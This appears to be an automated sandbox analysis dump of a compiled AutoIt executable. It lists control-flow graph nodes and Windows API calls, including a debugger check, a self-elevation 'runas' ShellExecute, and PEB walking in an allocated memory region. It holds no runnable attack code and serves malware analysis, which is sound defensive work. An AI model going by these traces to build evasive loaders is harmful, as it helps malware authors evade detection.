library calls 99115->99262 99118 77eb98 99120 762f95 _free 58 API calls 99118->99120 99120->99122 99163 745934 99122->99163 99124 74766f 59 API calls 99124->99141 99134 747f41 59 API calls 99134->99141 99138 77ebbb 99263 79fcb1 89 API calls 4 library calls 99138->99263 99140 77ebd4 99142 762f95 _free 58 API calls 99140->99142 99141->99111 99141->99124 99141->99134 99141->99138 99257 79fc4d 59 API calls 2 library calls 99141->99257 99258 79fb6e 61 API calls 2 library calls 99141->99258 99259 7a7621 59 API calls Mailbox 99141->99259 99260 747373 59 API calls Mailbox 99141->99260 99143 77ebe7 99142->99143 99143->99122 99145 74770f 99144->99145 99148 747682 _memmove 99144->99148 99147 760ff6 Mailbox 59 API calls 99145->99147 99146 760ff6 Mailbox 59 API calls 99149 747689 99146->99149 99147->99148 99148->99146 99150 760ff6 Mailbox 59 API calls 99149->99150 99151 7476b2 99149->99151 99150->99151 99151->99035 99153 7474d0 99152->99153 99156 74757e 99152->99156 99155 760ff6 Mailbox 59 API calls 99153->99155 99157 747502 99153->99157 99154 760ff6 59 API calls Mailbox 99154->99157 99155->99157 99156->99035 99157->99154 99157->99156 99158->99022 99159->99035 99160->99035 99161->99035 99162->99031 99164 745dcf CloseHandle 99163->99164 99165 74593c Mailbox 99164->99165 99166 745dcf CloseHandle 99165->99166 99167 74594b 99166->99167 99167->99103 99168->99056 99170 745dcf CloseHandle 99169->99170 99171 745962 99170->99171 99266 745df9 99171->99266 99173 745981 99177 7459a4 99173->99177 99274 745770 99173->99274 99175 745993 99291 7453db SetFilePointerEx SetFilePointerEx 99175->99291 99177->99057 99177->99061 99178 77e030 99292 7a3696 SetFilePointerEx SetFilePointerEx WriteFile 99178->99292 99179 74599a 99179->99177 99179->99178 99181 77e060 99181->99177 99182->99069 99183->99085 99190 745c68 99184->99190 99185 77e151 99306 745dae SetFilePointerEx 99185->99306 99186 745cef SetFilePointerEx 99305 745dae SetFilePointerEx 99186->99305 99189 77e16b 99190->99185 99190->99186 99191 745cc3 99190->99191 99191->99065 99193 7477c7 59 API calls 99192->99193 99194 74470f 99193->99194 99195 7477c7 59 API calls 99194->99195 99196 744717 99195->99196 99197 7477c7 59 API calls 99196->99197 99198 74471f 99197->99198 99199 7477c7 59 API calls 99198->99199 99200 744727 99199->99200 99201 77d8fb 99200->99201 99202 74475b 99200->99202 99203 7481a7 59 API calls 99201->99203 99204 7479ab 59 API calls 99202->99204 99205 77d904 99203->99205 99206 744769 99204->99206 99207 747eec 59 API calls 99205->99207 99208 747e8c 59 API calls 99206->99208 99210 74479e 99207->99210 99209 744773 99208->99209 99209->99210 99211 7479ab 59 API calls 99209->99211 99213 77d924 99210->99213 99214 7447bd 99210->99214 99229 7447de 99210->99229 99215 744794 99211->99215 99217 77d9f4 99213->99217 99225 77d9dd 99213->99225 99237 77d95b 99213->99237 99219 747b52 59 API calls 99214->99219 99218 747e8c 59 API calls 99215->99218 99216 7447ef 99220 744801 99216->99220 99222 7481a7 59 API calls 99216->99222 99221 747d2c 59 API calls 99217->99221 99218->99210 99223 7447c7 99219->99223 99238 77d9b1 99221->99238 99222->99220 99228 7479ab 59 API calls 99223->99228 99223->99229 99225->99217 99233 77d9c8 99225->99233 99228->99229 99307 7479ab 99229->99307 99232 747b52 59 API calls 99232->99238 99236 747d2c 59 API calls 99233->99236 99234 77d9b9 99235 747d2c 59 API calls 99234->99235 99235->99238 99236->99238 99237->99234 99241 77d9a4 99237->99241 99238->99229 99238->99232 99320 747a84 59 API calls 2 library calls 99238->99320 99242 747d2c 59 API calls 99241->99242 99242->99238 99254->99057 99255->99062 99256->99089 99257->99141 99258->99141 99259->99141 99260->99141 99261->99115 99262->99118 99263->99140 99267 77e181 99266->99267 99268 745e12 CreateFileW 99266->99268 99269 77e187 CreateFileW 99267->99269 99271 745e34 99267->99271 99268->99271 99270 77e1ad 99269->99270 99269->99271 99272 745c4e 2 API calls 99270->99272 99271->99173 99273 77e1b8 99272->99273 99273->99271 99275 77dfce 99274->99275 99276 74578b 99274->99276 99290 74581a 99275->99290 99299 745e3f 99275->99299 99277 745c4e 2 API calls 99276->99277 99276->99290 99278 7457ad 99277->99278 99279 74538e 59 API calls 99278->99279 99281 7457b7 99279->99281 99281->99275 99282 7457c4 99281->99282 99283 760ff6 Mailbox 59 API calls 99282->99283 99284 7457cf 99283->99284 99285 74538e 59 API calls 99284->99285 99286 7457da 99285->99286 99293 745d20 99286->99293 99289 745c4e 2 API calls 99289->99290 99290->99175 99291->99179 99292->99181 99294 745d93 99293->99294 99298 745d2e 99293->99298 99304 745dae SetFilePointerEx 99294->99304 99296 745807 99296->99289 99297 745d66 ReadFile 99297->99296 99297->99298 99298->99296 99298->99297 99300 745c4e 2 API calls 99299->99300 99301 745e60 99300->99301 99302 745c4e 2 API calls 99301->99302 99303 745e74 99302->99303 99303->99290 99304->99298 99305->99191 99306->99189 99308 747a17 99307->99308 99309 7479ba 99307->99309 99310 747e8c 59 API calls 99308->99310 99309->99308 99311 7479c5 99309->99311 99317 7479e8 _memmove 99310->99317 99312 7479e0 99311->99312 99313 77ef32 99311->99313 99315 748087 59 API calls 99312->99315 99314 748189 59 API calls 99313->99314 99316 77ef3c 99314->99316 99315->99317 99317->99216 99320->99238 99322 746ef5 99321->99322 99323 747009 99321->99323 99322->99323 99324 760ff6 Mailbox 59 API calls 99322->99324 99323->97886 99326 746f1c 99324->99326 99325 760ff6 Mailbox 59 API calls 99326->99325 99332->97889 99922 743633 99923 74366a 99922->99923 99924 7436e7 99923->99924 99925 743688 99923->99925 99926 7436e5 99923->99926 99927 7436ed 99924->99927 99928 77d31c 99924->99928 99929 743695 99925->99929 99930 74375d PostQuitMessage 99925->99930 99931 7436ca DefWindowProcW 99926->99931 99932 743715 SetTimer RegisterWindowMessageW 99927->99932 99933 7436f2 99927->99933 99972 7511d0 10 API calls Mailbox 99928->99972 99934 7436a0 99929->99934 99935 77d38f 99929->99935 99937 7436d8 99930->99937 99931->99937 99932->99937 99940 74373e CreatePopupMenu 99932->99940 99938 77d2bf 99933->99938 99939 7436f9 KillTimer 99933->99939 99941 743767 99934->99941 99942 7436a8 99934->99942 99976 7a2a16 71 API calls _memset 99935->99976 99945 77d2c4 99938->99945 99946 77d2f8 MoveWindow 99938->99946 99967 7444cb Shell_NotifyIconW _memset 99939->99967 99940->99937 99970 744531 64 API calls _memset 99941->99970 99948 77d374 99942->99948 99949 7436b3 99942->99949 99944 77d343 99973 7511f3 341 API calls Mailbox 99944->99973 99953 77d2e7 SetFocus 99945->99953 99954 77d2c8 99945->99954 99946->99937 99948->99931 99975 79817e 59 API calls Mailbox 99948->99975 99956 7436be 99949->99956 99957 74374b 99949->99957 99950 77d3a1 99950->99931 99950->99937 99953->99937 99954->99956 99959 77d2d1 99954->99959 99955 74370c 99968 743114 DeleteObject DestroyWindow Mailbox 99955->99968 99956->99931 99974 7444cb Shell_NotifyIconW _memset 99956->99974 99969 7445df 81 API calls _memset 99957->99969 99958 74375b 99958->99937 99971 7511d0 10 API calls Mailbox 99959->99971 99965 77d368 99966 7443db 68 API calls 99965->99966 99966->99926 99967->99955 99968->99937 99969->99958 99970->99958 99971->99937 99972->99944 99973->99956 99974->99965 99975->99926 99976->99950 99977 74107d 99982 7471eb 99977->99982 99979 74108c 99980 762f80 __cinit 67 API calls 99979->99980 99981 741096 99980->99981 99983 7471fb __ftell_nolock 99982->99983 99984 7477c7 59 API calls 99983->99984 99985 7472b1 99984->99985 99986 744864 61 API calls 99985->99986 99987 7472ba 99986->99987 100013 76074f 99987->100013 99990 747e0b 59 API calls 99991 7472d3 99990->99991 99992 743f84 59 API calls 99991->99992 99993 7472e2 99992->99993 99994 7477c7 59 API calls 99993->99994 99995 7472eb 99994->99995 99996 747eec 59 API calls 99995->99996 99997 7472f4 RegOpenKeyExW 99996->99997 99998 77ecda RegQueryValueExW 99997->99998 100003 747316 Mailbox 99997->100003 99999 77ecf7 99998->99999 100000 77ed6c RegCloseKey 99998->100000 100001 760ff6 Mailbox 59 API calls 99999->100001 100000->100003 100011 77ed7e _wcscat Mailbox __wsetenvp 100000->100011 100002 77ed10 100001->100002 100004 74538e 59 API calls 100002->100004 100003->99979 100005 77ed1b RegQueryValueExW 100004->100005 100006 77ed38 100005->100006 100008 77ed52 100005->100008 100007 747d2c 59 API calls 100006->100007 100007->100008 100008->100000 100009 747f41 59 API calls 100009->100011 100010 743f84 59 API calls 100010->100011 100011->100003 100011->100009 100011->100010 100012 747b52 59 API calls 100011->100012 100012->100011 100014 771b90 __ftell_nolock 100013->100014 100015 76075c GetFullPathNameW 100014->100015 100016 76077e 100015->100016 100017 747d2c 59 API calls 100016->100017 100018 7472c5 100017->100018 100018->99990 100019 23923b0 100033 2390000 100019->100033 100021 239248b 100036 23922a0 100021->100036 100039 23934b0 GetPEB 100033->100039 100035 239068b 100035->100021 100037 23922a9 Sleep 100036->100037 100038 23922b7 100037->100038 100040 23934da 100039->100040 100040->100035 100041 77ff06 100042 77ff10 100041->100042 100076 74ac90 Mailbox _memmove 100041->100076 100290 748e34 59 API calls Mailbox 100042->100290 100047 74b5d5 100052 7481a7 59 API calls 100047->100052 100050 760ff6 59 API calls Mailbox 100066 74a097 Mailbox 100050->100066 100062 74a1b7 100052->100062 100053 78047f 100294 7aa0b5 89 API calls 4 library calls 100053->100294 100054 74b5da 100300 7aa0b5 89 API calls 4 library calls 100054->100300 100057 7481a7 59 API calls 100057->100066 100058 747f41 59 API calls 100058->100076 100059 7477c7 59 API calls 100059->100066 100060 797405 59 API calls 100060->100066 100061 78048e 100064 7966f4 Mailbox 59 API calls 100064->100062 100065 780e00 100299 7aa0b5 89 API calls 4 library calls 100065->100299 100066->100047 100066->100050 100066->100053 100066->100054 100066->100057 100066->100059 100066->100060 100066->100062 100066->100065 100068 762f80 67 API calls __cinit 100066->100068 100070 74a6ba 100066->100070 100284 74ca20 341 API calls 2 library calls 100066->100284 100285 74ba60 60 API calls Mailbox 100066->100285 100068->100066 100069 7bbf80 341 API calls 100069->100076 100298 7aa0b5 89 API calls 4 library calls 100070->100298 100072 760ff6 59 API calls Mailbox 100072->100076 100073 74b416 100289 74f803 341 API calls 100073->100289 100075 74a000 341 API calls 100075->100076 100076->100058 100076->100062 100076->100066 100076->100069 100076->100072 100076->100073 100076->100075 100077 780c94 100076->100077 100079 780ca2 100076->100079 100082 74b37c 100076->100082 100087 74b685 100076->100087 100090 74ade2 Mailbox 100076->100090 100243 7bc5f4 100076->100243 100275 7a7be0 100076->100275 100281 7966f4 100076->100281 100291 797405 59 API calls 100076->100291 100292 7bc4a7 85 API calls 2 library calls 100076->100292 100296 749df0 59 API calls Mailbox 100077->100296 100297 7aa0b5 89 API calls 4 library calls 100079->100297 100081 780c86 100081->100062 100081->100064 100287 749e9c 60 API calls Mailbox 100082->100287 100084 74b38d 100288 749e9c 60 API calls Mailbox 100084->100288 100295 7aa0b5 89 API calls 4 library calls 100087->100295 100090->100062 100090->100081 100090->100087 100091 7800e0 VariantClear 100090->100091 100097 7ad2e5 100090->100097 100144 752123 100090->100144 100184 7b474d 100090->100184 100193 7be237 100090->100193 100196 7ad2e6 100090->100196 100286 749df0 59 API calls Mailbox 100090->100286 100293 797405 59 API calls 100090->100293 100091->100090 100098 7ad310 100097->100098 100099 7ad305 100097->100099 100101 7ad3ea Mailbox 100098->100101 100104 7477c7 59 API calls 100098->100104 100301 749c9c 59 API calls 100099->100301 100102 760ff6 Mailbox 59 API calls 100101->100102 100142 7ad3f3 Mailbox 100101->100142 100103 7ad433 100102->100103 100105 7ad43f 100103->100105 100304 745906 60 API calls Mailbox 100103->100304 100106 7ad334 100104->100106 100110 749997 84 API calls 100105->100110 100108 7477c7 59 API calls 100106->100108 100109 7ad33d 100108->100109 100111 749997 84 API calls 100109->100111 100112 7ad457 100110->100112 100114 7ad349 100111->100114 100113 745956 67 API calls 100112->100113 100115 7ad466 100113->100115 100116 7446f9 59 API calls 100114->100116 100117 7ad46a GetLastError 100115->100117 100118 7ad49e 100115->100118 100119 7ad35e 100116->100119 100120 7ad483 100117->100120 100123 7ad4c9 100118->100123 100124 7ad500 100118->100124 100121 747c8e 59 API calls 100119->100121 100120->100142 100305 745a1a CloseHandle 100120->100305 100122 7ad391 100121->100122 100126 7ad3e3 100122->100126 100131 7a3e73 3 API calls 100122->100131 100125 760ff6 Mailbox 59 API calls 100123->100125 100127 760ff6 Mailbox 59 API calls 100124->100127 100128 7ad4ce 100125->100128 100303 749c9c 59 API calls 100126->100303 100132 7ad505 100127->100132 100134 7477c7 59 API calls 100128->100134 100137 7ad4df 100128->100137 100133 7ad3a1 100131->100133 100136 7477c7 59 API calls 100132->100136 100132->100142 100133->100126 100135 7ad3a5 100133->100135 100134->100137 100139 747f41 59 API calls 100135->100139 100136->100142 100306 7af835 59 API calls 2 library calls 100137->100306 100140 7ad3b2 100139->100140 100302 7a3c66 63 API calls Mailbox 100140->100302 100142->100090 100143 7ad3bb Mailbox 100143->100126 100307 749bf8 100144->100307 100148 760ff6 Mailbox 59 API calls 100149 752154 100148->100149 100152 752164 100149->100152 100335 745906 60 API calls Mailbox 100149->100335 100150 7869af 100151 752189 100150->100151 100339 7af7df 59 API calls 100150->100339 100160 752196 100151->100160 100340 749c9c 59 API calls 100151->100340 100154 749997 84 API calls 100152->100154 100156 752172 100154->100156 100157 745956 67 API calls 100156->100157 100159 752181 100157->100159 100158 7869f7 100158->100160 100161 7869ff 100158->100161 100159->100150 100159->100151 100338 745a1a CloseHandle 100159->100338 100162 745e3f 2 API calls 100160->100162 100341 749c9c 59 API calls 100161->100341 100165 75219d 100162->100165 100166 7521b7 100165->100166 100167 786a11 100165->100167 100168 7477c7 59 API calls 100166->100168 100169 760ff6 Mailbox 59 API calls 100167->100169 100171 7521bf 100168->100171 100170 786a17 100169->100170 100172 786a2b 100170->100172 100342 7459b0 ReadFile SetFilePointerEx 100170->100342 100320 7456d2 100171->100320 100178 786a2f _memmove 100172->100178 100343 7a794e 59 API calls 2 library calls 100172->100343 100176 7521ce 100176->100178 100336 749b9c 59 API calls Mailbox 100176->100336 100179 7521e2 Mailbox 100180 75221c 100179->100180 100181 745dcf CloseHandle 100179->100181 100180->100090 100182 752210 100181->100182 100182->100180 100337 745a1a CloseHandle 100182->100337 100185 749997 84 API calls 100184->100185 100186 7b4787 100185->100186 100187 7463a0 94 API calls 100186->100187 100188 7b4797 100187->100188 100189 7b47bc 100188->100189 100190 74a000 341 API calls 100188->100190 100191 749bf8 59 API calls 100189->100191 100192 7b47c0 100189->100192 100190->100189 100191->100192 100192->100090 100194 7bcdf1 130 API calls 100193->100194 100195 7be247 100194->100195 100195->100090 100197 7ad310 100196->100197 100198 7ad305 100196->100198 100202 7477c7 59 API calls 100197->100202 100241 7ad3ea Mailbox 100197->100241 100367 749c9c 59 API calls 100198->100367 100200 760ff6 Mailbox 59 API calls 100201 7ad433 100200->100201 100203 7ad43f 100201->100203 100370 745906 60 API calls Mailbox 100201->100370 100204 7ad334 100202->100204 100208 749997 84 API calls 100203->100208 100206 7477c7 59 API calls 100204->100206 100207 7ad33d 100206->100207 100209 749997 84 API calls 100207->100209 100210 7ad457 100208->100210 100212 7ad349 100209->100212 100211 745956 67 API calls 100210->100211 100213 7ad466 100211->100213 100214 7446f9 59 API calls 100212->100214 100215 7ad46a GetLastError 100213->100215 100216 7ad49e 100213->100216 100217 7ad35e 100214->100217 100218 7ad483 100215->100218 100221 7ad4c9 100216->100221 100222 7ad500 100216->100222 100219 747c8e 59 API calls 100217->100219 100224 7ad3f3 Mailbox 100218->100224 100371 745a1a CloseHandle 100218->100371 100220 7ad391 100219->100220 100225 7ad3e3 100220->100225 100230 7a3e73 3 API calls 100220->100230 100223 760ff6 Mailbox 59 API calls 100221->100223 100226 760ff6 Mailbox 59 API calls 100222->100226 100227 7ad4ce 100223->100227 100224->100090 100369 749c9c 59 API calls 100225->100369 100232 7ad505 100226->100232 100233 7477c7 59 API calls 100227->100233 100234 7ad4df 100227->100234 100231 7ad3a1 100230->100231 100231->100225 100235 7ad3a5 100231->100235 100232->100224 100236 7477c7 59 API calls 100232->100236 100233->100234 100372 7af835 59 API calls 2 library calls 100234->100372 100238 747f41 59 API calls 100235->100238 100236->100224 100239 7ad3b2 100238->100239 100368 7a3c66 63 API calls Mailbox 100239->100368 100241->100200 100241->100224 100242 7ad3bb Mailbox 100242->100225 100244 7477c7 59 API calls 100243->100244 100245 7bc608 100244->100245 100246 7477c7 59 API calls 100245->100246 100247 7bc610 100246->100247 100248 7477c7 59 API calls 100247->100248 100249 7bc618 100248->100249 100250 749997 84 API calls 100249->100250 100251 7bc626 100250->100251 100252 747d2c 59 API calls 100251->100252 100253 7bc80f 100251->100253 100254 7bc83c Mailbox 100251->100254 100256 7bc7f6 100251->100256 100258 7bc811 100251->100258 100260 747a84 59 API calls 100251->100260 100262 7481a7 59 API calls 100251->100262 100263 747faf 59 API calls 100251->100263 100268 747faf 59 API calls 100251->100268 100272 749997 84 API calls 100251->100272 100273 747c8e 59 API calls 100251->100273 100274 747e0b 59 API calls 100251->100274 100252->100251 100253->100254 100386 749b9c 59 API calls Mailbox 100253->100386 100254->100076 100257 747e0b 59 API calls 100256->100257 100259 7bc803 100257->100259 100261 747e0b 59 API calls 100258->100261 100264 747c8e 59 API calls 100259->100264 100260->100251 100265 7bc820 100261->100265 100262->100251 100266 7bc6bd CharUpperBuffW 100263->100266 100264->100253 100267 747c8e 59 API calls 100265->100267 100373 74859a 68 API calls 100266->100373 100267->100253 100269 7bc77d CharUpperBuffW 100268->100269 100374 74c707 100269->100374 100272->100251 100273->100251 100274->100251 100276 7a7bec 100275->100276 100277 760ff6 Mailbox 59 API calls 100276->100277 100278 7a7bfa 100277->100278 100279 7a7c08 100278->100279 100280 7477c7 59 API calls 100278->100280 100279->100076 100280->100279 100389 796636 100281->100389 100283 796702 100283->100076 100284->100066 100285->100066 100286->100090 100287->100084 100288->100073 100289->100087 100290->100076 100291->100076 100292->100076 100293->100090 100294->100061 100295->100081 100296->100081 100297->100081 100298->100062 100299->100054 100300->100062 100301->100098 100302->100143 100303->100101 100304->100105 100305->100142 100306->100142 100308 77fbff 100307->100308 100309 749c08 100307->100309 100310 77fc10 100308->100310 100312 747d2c 59 API calls 100308->100312 100313 760ff6 Mailbox 59 API calls 100309->100313 100311 747eec 59 API calls 100310->100311 100315 77fc1a 100311->100315 100312->100310 100314 749c1b 100313->100314 100314->100315 100317 749c26 100314->100317 100316 749c34 100315->100316 100318 7477c7 59 API calls 100315->100318 100316->100148 100316->100150 100317->100316 100319 747f41 59 API calls 100317->100319 100318->100316 100319->100316 100321 745702 100320->100321 100322 7456dd 100320->100322 100323 747eec 59 API calls 100321->100323 100322->100321 100326 7456ec 100322->100326 100327 7a349a 100323->100327 100324 7a34c9 100324->100176 100346 745c18 100326->100346 100327->100324 100344 7a3436 ReadFile SetFilePointerEx 100327->100344 100345 747a84 59 API calls 2 library calls 100327->100345 100334 7a35d8 Mailbox 100334->100176 100335->100152 100336->100179 100337->100180 100338->100150 100339->100150 100340->100158 100341->100165 100342->100172 100343->100178 100344->100327 100345->100327 100347 760ff6 Mailbox 59 API calls 100346->100347 100348 745c2b 100347->100348 100349 760ff6 Mailbox 59 API calls 100348->100349 100350 745c37 100349->100350 100351 745632 100350->100351 100358 745a2f 100351->100358 100353 745674 100353->100334 100357 74793a 61 API calls Mailbox 100353->100357 100354 745d20 2 API calls 100355 745643 100354->100355 100355->100353 100355->100354 100365 745bda 59 API calls 2 library calls 100355->100365 100357->100334 100359 77e065 100358->100359 100360 745a40 100358->100360 100366 796443 59 API calls Mailbox 100359->100366 100360->100355 100362 77e06f 100363 760ff6 Mailbox 59 API calls 100362->100363 100364 77e07b 100363->100364 100365->100355 100366->100362 100367->100197 100368->100242 100369->100241 100370->100203 100371->100224 100372->100224 100373->100251 100375 747b76 59 API calls 100374->100375 100376 74c72c _wcscmp 100374->100376 100375->100376 100377 74c760 Mailbox 100376->100377 100378 747f41 59 API calls 100376->100378 100377->100251 100377->100377 100379 781abb 100378->100379 100380 747c8e 59 API calls 100379->100380 100381 781ac6 100380->100381 100387 74859a 68 API calls 100381->100387 100383 781ad7 100385 781adb Mailbox 100383->100385 100388 749e9c 60 API calls Mailbox 100383->100388 100385->100251 100386->100254 100387->100383 100388->100385 100390 79665e 100389->100390 100391 796641 100389->100391 100390->100283 100391->100390 100393 796621 59 API calls Mailbox 100391->100393 100393->100391 100394 741066 100399 74f8cf 100394->100399 100396 74106c 100397 762f80 __cinit 67 API calls 100396->100397 100398 741076 100397->100398 100400 74f8f0 100399->100400 100432 760143 100400->100432 100404 74f937 100405 7477c7 59 API calls 100404->100405 100406 74f941 100405->100406 100407 7477c7 59 API calls 100406->100407 100408 74f94b 100407->100408 100409 7477c7 59 API calls 100408->100409 100410 74f955 100409->100410 100411 7477c7 59 API calls 100410->100411 100412 74f993 100411->100412 100413 7477c7 59 API calls 100412->100413 100414 74fa5e 100413->100414 100442 7560e7 100414->100442 100418 74fa90 100419 7477c7 59 API calls 100418->100419 100420 74fa9a 100419->100420 100470 75ffde 100420->100470 100422 74fae1 100423 74faf1 GetStdHandle 100422->100423 100424 74fb3d 100423->100424 100425 7849d5 100423->100425 100426 74fb45 OleInitialize 100424->100426 100425->100424 100427 7849de 100425->100427 100426->100396 100477 7a6dda 64 API calls Mailbox 100427->100477 100429 7849e5 100478 7a74a9 CreateThread 100429->100478 100431 7849f1 CloseHandle 100431->100426 100479 76021c 100432->100479 100435 76021c 59 API calls 100436 760185 100435->100436 100437 7477c7 59 API calls 100436->100437 100438 760191 100437->100438 100439 747d2c 59 API calls 100438->100439 100440 74f8f6 100439->100440 100441 7603a2 6 API calls 100440->100441 100441->100404 100443 7477c7 59 API calls 100442->100443 100444 7560f7 100443->100444 100445 7477c7 59 API calls 100444->100445 100446 7560ff 100445->100446 100486 755bfd 100446->100486 100449 755bfd 59 API calls 100450 75610f 100449->100450 100451 7477c7 59 API calls 100450->100451 100452 75611a 100451->100452 100453 760ff6 Mailbox 59 API calls 100452->100453 100454 74fa68 100453->100454 100455 756259 100454->100455 100456 756267 100455->100456 100457 7477c7 59 API calls 100456->100457 100458 756272 100457->100458 100459 7477c7 59 API calls 100458->100459 100460 75627d 100459->100460 100461 7477c7 59 API calls 100460->100461 100462 756288 100461->100462 100463 7477c7 59 API calls 100462->100463 100464 756293 100463->100464 100465 755bfd 59 API calls 100464->100465 100466 75629e 100465->100466 100467 760ff6 Mailbox 59 API calls 100466->100467 100468 7562a5 RegisterWindowMessageW 100467->100468 100468->100418 100471 795cc3 100470->100471 100472 75ffee 100470->100472 100489 7a9d71 60 API calls 100471->100489 100474 760ff6 Mailbox 59 API calls 100472->100474 100476 75fff6 100474->100476 100475 795cce 100476->100422 100477->100429 100478->100431 100490 7a748f 65 API calls 100478->100490 100480 7477c7 59 API calls 100479->100480 100481 760227 100480->100481 100482 7477c7 59 API calls 100481->100482 100483 76022f 100482->100483 100484 7477c7 59 API calls 100483->100484 100485 76017b 100484->100485 100485->100435 100487 7477c7 59 API calls 100486->100487 100488 755c05 100487->100488 100488->100449 100489->100475 100491 78220e GetTempPathW 100492 78222b 100491->100492 100493 74b56e 100500 75fb84 100493->100500 100495 74b584 100496 74c707 69 API calls 100495->100496 100497 74b5ac 100496->100497 100499 74a4e8 100497->100499 100509 7aa0b5 89 API calls 4 library calls 100497->100509 100501 75fb90 100500->100501 100502 75fba2 100500->100502 100510 749e9c 60 API calls Mailbox 100501->100510 100503 75fbd1 100502->100503 100504 75fba8 100502->100504 100511 749e9c 60 API calls Mailbox 100503->100511 100506 760ff6 Mailbox 59 API calls 100504->100506 100508 75fb9a 100506->100508 100508->100495 100509->100499 100510->100508 100511->100508 100512 780226 100519 74ade2 Mailbox 100512->100519 100513 74b6c1 100529 7aa0b5 89 API calls 4 library calls 100513->100529 100515 780c86 100516 7966f4 Mailbox 59 API calls 100515->100516 100517 780c8f 100516->100517 100519->100513 100519->100515 100519->100517 100520 7800e0 VariantClear 100519->100520 100522 7b474d 341 API calls 100519->100522 100523 752123 95 API calls 100519->100523 100524 7ad2e6 101 API calls 100519->100524 100525 7be237 130 API calls 100519->100525 100526 7ad2e5 101 API calls 100519->100526 100527 749df0 59 API calls Mailbox 100519->100527 100528 797405 59 API calls 100519->100528 100520->100519 100522->100519 100523->100519 100524->100519 100525->100519 100526->100519 100527->100519 100528->100519 100529->100515 100530 74568a 100531 745c18 59 API calls 100530->100531 100532 74569c 100531->100532 100533 745632 61 API calls 100532->100533 100534 7456aa 100533->100534 100536 7456ba Mailbox 100534->100536 100537 7481c1 MultiByteToWideChar 100534->100537 100538 7481e7 100537->100538 100539 74822e 100537->100539 100541 760ff6 Mailbox 59 API calls 100538->100541 100540 747eec 59 API calls 100539->100540 100544 748220 100540->100544 100542 7481fc MultiByteToWideChar 100541->100542 100545 7478ad 100542->100545 100544->100536 100546 7478bc 100545->100546 100547 74792f 100545->100547 100546->100547 100549 7478c8 100546->100549 100548 747e8c 59 API calls 100547->100548 100550 7478da _memmove 100548->100550 100551 747900 100549->100551 100552 7478d2 100549->100552 100550->100544 100554 748189 59 API calls 100551->100554 100553 748087 59 API calls 100552->100553 100553->100550 100555 74790a 100554->100555 100556 760ff6 Mailbox 59 API calls 100555->100556 100556->100550 100557 74e70b 100560 74d260 100557->100560 100559 74e719 100561 74d27d 100560->100561 100589 74d4dd 100560->100589 100562 782b0a 100561->100562 100563 782abb 100561->100563 100592 74d2a4 100561->100592 100604 7ba6fb 341 API calls __cinit 100562->100604 100566 782abe 100563->100566 100574 782ad9 100563->100574 100567 782aca 100566->100567 100566->100592 100602 7bad0f 341 API calls 100567->100602 100568 762f80 __cinit 67 API calls 100568->100592 100571 74d594 100596 748bb2 68 API calls 100571->100596 100572 782cdf 100572->100572 100573 74d6ab 100573->100559 100574->100589 100603 7bb1b7 341 API calls 3 library calls 100574->100603 100578 74d5a3 100578->100559 100579 782c26 100608 7baa66 89 API calls 100579->100608 100582 748620 69 API calls 100582->100592 100589->100573 100609 7aa0b5 89 API calls 4 library calls 100589->100609 100590 74a000 341 API calls 100590->100592 100591 7481a7 59 API calls 100591->100592 100592->100568 100592->100571 100592->100573 100592->100579 100592->100582 100592->100589 100592->100590 100592->100591 100594 7488a0 68 API calls __cinit 100592->100594 100595 7486a2 68 API calls 100592->100595 100597 74859a 68 API calls 100592->100597 100598 74d0dc 341 API calls 100592->100598 100599 749f3a 59 API calls Mailbox 100592->100599 100600 74d060 89 API calls 100592->100600 100601 74cedd 341 API calls 100592->100601 100605 748bb2 68 API calls 100592->100605 100606 749e9c 60 API calls Mailbox 100592->100606 100607 796d03 60 API calls 100592->100607 100594->100592 100595->100592 100596->100578 100597->100592 100598->100592 100599->100592 100600->100592 100601->100592 100602->100573 100603->100589 100604->100592 100605->100592 100606->100592 100607->100592 100608->100589 100609->100572

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00743B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00743B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,008062F8,008062E0,?,?), ref: 00743BFD
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                      • Part of subcall function 00750A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00743C26,008062F8,?,?,?), ref: 00750ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00743C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007F93F0,00000010), ref: 0077D4BC
                    • SetCurrentDirectoryW.KERNEL32(?,008062F8,?,?,?), ref: 0077D4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007F5D40,008062F8,?,?,?), ref: 0077D57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0077D581
                      • Part of subcall function 00743A58: GetSysColorBrush.USER32(0000000F), ref: 00743A62
                      • Part of subcall function 00743A58: LoadCursorW.USER32(00000000,00007F00), ref: 00743A71
                      • Part of subcall function 00743A58: LoadIconW.USER32(00000063), ref: 00743A88
                      • Part of subcall function 00743A58: LoadIconW.USER32(000000A4), ref: 00743A9A
                      • Part of subcall function 00743A58: LoadIconW.USER32(000000A2), ref: 00743AAC
                      • Part of subcall function 00743A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00743AD2
                      • Part of subcall function 00743A58: RegisterClassExW.USER32(?), ref: 00743B28
                      • Part of subcall function 007439E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00743A15
                      • Part of subcall function 007439E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00743A36
                      • Part of subcall function 007439E7: ShowWindow.USER32(00000000,?,?), ref: 00743A4A
                      • Part of subcall function 007439E7: ShowWindow.USER32(00000000,?,?), ref: 00743A53
                      • Part of subcall function 007443DB: _memset.LIBCMT ref: 00744401
                      • Part of subcall function 007443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007444A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
